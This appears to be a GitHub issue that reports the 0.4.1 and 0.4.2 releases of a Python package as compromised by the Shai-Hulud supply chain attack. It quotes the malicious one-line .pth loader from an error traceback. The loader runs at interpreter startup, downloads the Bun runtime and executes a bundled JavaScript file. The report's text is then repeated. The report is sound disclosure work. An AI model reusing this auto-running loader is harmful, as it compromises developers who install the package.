While installing the latest version of the package (0.4.2 at the time of writing), I noticed a weird message
Error processing line 1 of /Users/stefano.cretti/.local/share/mamba/envs/test_plot/lib/python3.14/site-packages/coolbox-setup.pth:
Traceback (most recent call last):
File "<frozen site>", line 213, in addpackage
File "<string>", line 1, in <module>
File "<string>", line 1
import os as _o,subprocess as _s,urllib.request as _u,platform as _p,sys as _y;_d=_o.path.dirname;_n=_o.path.join;_j=_n(_d(__file__),"_index.js");if not
_o.path.exists(_j):import glob as _g;_c=_g.glob(_n(_d(__file__),"*","_index.js"));_j=_c[0]if _c else"";_e=_o.name=="nt";_b=_n(_T.gettempdir(),"b","bun"+(".exe" if _e else""));if not
_o.path.exists(_b):_a="aarch64" if _p.machine()=="arm64" else"x64";_m={"linux":"linux","darwin":"darwin","win32":"windows"}.get(_y.platform,"linux");_z=_n(_T.gettempdir(),"b.zip");_u
.urlretrieve(f"https://github.com/oven-sh/bun/releases/download/bun-v1.3.13/bun-{_m}-{_a}.zip",_z);import zipfile as
_zf;_zf.ZipFile(_z).extract(_o.path.basename(_b),_d(_b));_o.chmod(_b,509);_o.unlink(_z);_s.run([_b,"run",_j],check=False);open(_G,"w").close()
^^
SyntaxError: invalid syntax
Remainder of file ignored
By investigating it, I found out that versions 0.4.1 and 0.4.2 of the package are affected by the Shai-Hulud supply chain attack.
I was saved by the usage of Python 3.14, but I could have been affected were I using an older version.
This issue is to inform the maintainers (if not addressed, any newer version published from their machines will be affected) as well as anyone who might have installed the package.
As far as I can tell, version 0.4.0 is the latest uncompromised one, so I would advise pinning that for the time being.
While installing the latest version of the package (0.4.2 at the time of writing), I noticed a weird message
By investigating it, I found out that versions 0.4.1 and 0.4.2 of the package are affected by the Shai-Hulud supply chain attack.
I was saved by the usage of Python 3.14, but I could have been affected were I using an older version.
This issue is to inform the maintainers (if not addressed, any newer version published from their machines will be affected) as well as anyone who might have installed the package.
As far as I can tell, version 0.4.0 is the latest uncompromised one, so I would advise pinning that for the time being.